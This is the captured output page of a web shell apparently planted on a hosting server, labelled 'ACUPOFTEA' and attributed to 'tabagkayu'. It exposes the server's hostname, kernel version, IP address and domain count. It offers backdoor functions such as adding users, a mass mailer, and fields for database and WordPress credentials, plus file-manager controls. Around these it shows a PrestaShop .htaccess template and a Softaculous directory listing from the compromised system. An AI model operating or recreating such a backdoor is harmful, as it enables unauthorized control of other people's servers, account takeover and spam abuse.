System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
presta17
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
.htaccess
# ~~start~~ Do not remove this comment, Prestashop will keep automatically the code outside this comment when .htaccess will be generated again # .htaccess automaticaly generated by PrestaShop e-commerce open-source solution # https://www.prestashop-project.org # Prevent directory listings Options -Indexes <IfModule mod_rewrite.c> <IfModule mod_env.c> SetEnv HTTP_MOD_REWRITE On </IfModule> RewriteEngine on # Protect .git RewriteRule \.git - [F,L] #Domain: [[domhost]] RewriteRule . - [E=REWRITEBASE:[[relativeurl]]/] RewriteRule ^api(?:/(.*))?$ %{ENV:REWRITEBASE}webservice/dispatcher.php?url=$1 [QSA,L] RewriteRule ^upload/.+$ %{ENV:REWRITEBASE}index.php [QSA,L] # Rewrites for product images (support up to < 10 million images) RewriteCond %{HTTP_HOST} ^[[domhost]]$ RewriteRule ^(([\d])(?:\-[\w-]*)?)/.+(\.(?:jpe?g|webp|png|avif))$ %{ENV:REWRITEBASE}img/p/$2/$1$3 [L] RewriteCond %{HTTP_HOST} ^[[domhost]]$ RewriteRule ^(([\d])([\d])(?:\-[\w-]*)?)/.+(\.(?:jpe?g|webp|png|avif))$ %{ENV:REWRITEBASE}img/p/$2/$3/$1$4 [L] RewriteCond %{HTTP_HOST} ^[[domhost]]$ RewriteRule ^(([\d])([\d])([\d])(?:\-[\w-]*)?)/.+(\.(?:jpe?g|webp|png|avif))$ %{ENV:REWRITEBASE}img/p/$2/$3/$4/$1$5 [L] RewriteCond %{HTTP_HOST} ^[[domhost]]$ RewriteRule ^(([\d])([\d])([\d])([\d])(?:\-[\w-]*)?)/.+(\.(?:jpe?g|webp|png|avif))$ %{ENV:REWRITEBASE}img/p/$2/$3/$4/$5/$1$6 [L] RewriteCond %{HTTP_HOST} ^[[domhost]]$ RewriteRule ^(([\d])([\d])([\d])([\d])([\d])(?:\-[\w-]*)?)/.+(\.(?:jpe?g|webp|png|avif))$ %{ENV:REWRITEBASE}img/p/$2/$3/$4/$5/$6/$1$7 [L] RewriteCond %{HTTP_HOST} ^[[domhost]]$ RewriteRule ^(([\d])([\d])([\d])([\d])([\d])([\d])(?:\-[\w-]*)?)/.+(\.(?:jpe?g|webp|png|avif))$ %{ENV:REWRITEBASE}img/p/$2/$3/$4/$5/$6/$7/$1$8 [L] RewriteCond %{HTTP_HOST} ^[[domhost]]$ RewriteRule ^(([\d])([\d])([\d])([\d])([\d])([\d])([\d])(?:\-[\w-]*)?)/.+(\.(?:jpe?g|webp|png|avif))$ %{ENV:REWRITEBASE}img/p/$2/$3/$4/$5/$6/$7/$8/$1$9 [L] # Rewrites for category images RewriteCond %{HTTP_HOST} ^[[domhost]]$ RewriteRule ^c/([\d]+)(|_thumb)(\-[\.*\w-]*)/.+(\.(?:jpe?g|webp|png|avif))$ %{ENV:REWRITEBASE}img/c/$1$2$3$4 [L] RewriteCond %{HTTP_HOST} ^[[domhost]]$ RewriteRule ^c/([a-zA-Z_-]+)(|_thumb)(-[\d]+)?/.+(\.(?:jpe?g|webp|png|avif))$ %{ENV:REWRITEBASE}img/c/$1$2$3$4 [L] # AlphaImageLoader for IE and fancybox RewriteRule ^images_ie/?([^/]+)\.(jpe?g|png|gif)$ %{ENV:REWRITEBASE}js/jquery/plugins/fancybox/images/$1.$2 [L] # Send all other traffic to dispatcher RewriteCond %{REQUEST_FILENAME} -s [OR] RewriteCond %{REQUEST_FILENAME} -l [OR] RewriteCond %{REQUEST_FILENAME} -d RewriteRule ^.*$ - [NC,L] RewriteRule ^.*$ %{ENV:REWRITEBASE}index.php [NC,L] </IfModule> AddType application/vnd.ms-fontobject .eot AddType font/ttf .ttf AddType font/otf .otf AddType application/font-woff .woff AddType font/woff2 .woff2 <IfModule mod_headers.c> <FilesMatch "\.(ttf|ttc|otf|eot|woff|woff2|svg)$"> Header set Access-Control-Allow-Origin "*" </FilesMatch> </IfModule> <Files composer.lock> # Apache 2.2 <IfModule !mod_authz_core.c> Order deny,allow Deny from all </IfModule> # Apache 2.4 <IfModule mod_authz_core.c> Require all denied </IfModule> </Files> <IfModule mod_expires.c> ExpiresActive On AddType image/webp .webp ExpiresByType image/webp "access plus 1 month" ExpiresByType image/avif "access plus 1 month" ExpiresByType image/gif "access plus 1 month" ExpiresByType image/jpeg "access plus 1 month" ExpiresByType image/png "access plus 1 month" ExpiresByType text/css "access plus 1 week" ExpiresByType text/javascript "access plus 1 week" ExpiresByType application/javascript "access plus 1 week" ExpiresByType application/x-javascript "access plus 1 week" ExpiresByType image/x-icon "access plus 1 year" ExpiresByType image/svg+xml "access plus 1 year" ExpiresByType image/vnd.microsoft.icon "access plus 1 year" ExpiresByType application/font-woff "access plus 1 year" ExpiresByType application/x-font-woff "access plus 1 year" ExpiresByType font/woff2 "access plus 1 year" ExpiresByType application/vnd.ms-fontobject "access plus 1 year" ExpiresByType font/opentype "access plus 1 year" ExpiresByType font/ttf "access plus 1 year" ExpiresByType font/otf "access plus 1 year" ExpiresByType application/x-font-ttf "access plus 1 year" ExpiresByType application/x-font-otf "access plus 1 year" </IfModule> <IfModule mod_headers.c> Header unset Etag </IfModule> FileETag none <IfModule mod_deflate.c> <IfModule mod_filter.c> AddOutputFilterByType DEFLATE text/html text/css text/javascript application/javascript application/x-javascript font/ttf application/x-font-ttf font/otf application/x-font-otf font/opentype image/svg+xml </IfModule> </IfModule> #If rewrite mod isn't enabled ErrorDocument 404 [[relativeurl]]/index.php?controller=404 # ~~end~~ Do not remove this comment, Prestashop will keep automatically the code outside this comment when .htaccess will be generated again
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
bootstrap_old
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
images
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
php53
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
php56
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
php71
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
php81
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
php82
DIR
-
drwxr-xr-x
2025-06-29 09:39:22
.htaccess
text/plain
4.86 KB
-rw-r--r--
2025-06-19 02:46:34
_bootstrap.php
text/x-php
5.99 KB
-rw-r--r--
2025-06-19 02:46:34
bootstrap.php
text/x-php
5.91 KB
-rw-r--r--
2025-06-19 02:46:34
changelog.txt
text/plain
4.41 KB
-rw-r--r--
2025-06-19 02:46:34
clone.php
text/x-php
28.3 KB
-rw-r--r--
2025-06-27 07:38:10
clone_bootstrap.php
text/x-php
6.04 KB
-rw-r--r--
2025-06-19 02:46:34
edit.php
text/x-php
4.95 KB
-rw-r--r--
2025-06-27 07:38:10
edit.xml
text/html
447 B
-rw-r--r--
2024-01-03 04:51:40
extend.php
text/x-php
9.08 KB
-rw-r--r--
2025-06-27 07:38:10
fileindex.php
text/plain
478 B
-rw-r--r--
2025-06-19 02:46:34
import.php
text/x-php
6.6 KB
-rw-r--r--
2025-06-27 07:38:10
info.xml
text/html
4.68 KB
-rw-r--r--
2025-06-27 07:27:26
install.js
text/plain
1.12 KB
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
20.06 KB
-rw-r--r--
2025-06-27 07:38:10
install.xml
text/html
1.51 KB
-rw-r--r--
2024-04-16 09:24:16
md5
text/plain
2.17 KB
-rw-r--r--
2025-06-27 07:38:10
new_order.html
text/html
56.92 KB
-rw-r--r--
2025-06-19 02:46:34
notes.txt
text/plain
2.78 KB
-rw-r--r--
2025-06-19 02:46:34
order_conf.html
text/html
56.13 KB
-rw-r--r--
2025-06-19 02:46:34
parameters.php
text/x-php
826 B
-rw-r--r--
2025-06-19 02:46:34
parameters.yml
text/plain
11 B
-rw-r--r--
2021-12-23 06:54:36
return_slip.html
text/html
43.86 KB
-rw-r--r--
2025-06-19 02:46:34
robots.txt
text/plain
4.73 KB
-rw-r--r--
2025-06-19 02:46:34
settings.inc.php
text/x-php
23 B
-rw-r--r--
2021-12-23 06:54:36
shop1.json
text/plain
3.04 KB
-rw-r--r--
2025-06-19 02:46:34
soft_delete.php
text/x-php
3.08 KB
-rw-r--r--
2021-12-23 06:54:36
update_appkey.php
text/x-php
544 B
-rw-r--r--
2023-07-17 09:33:24
update_pass.php
text/x-php
497 B
-rw-r--r--
2023-03-21 05:54:32
~ ACUPOFTEA - mail.ontime-ae.com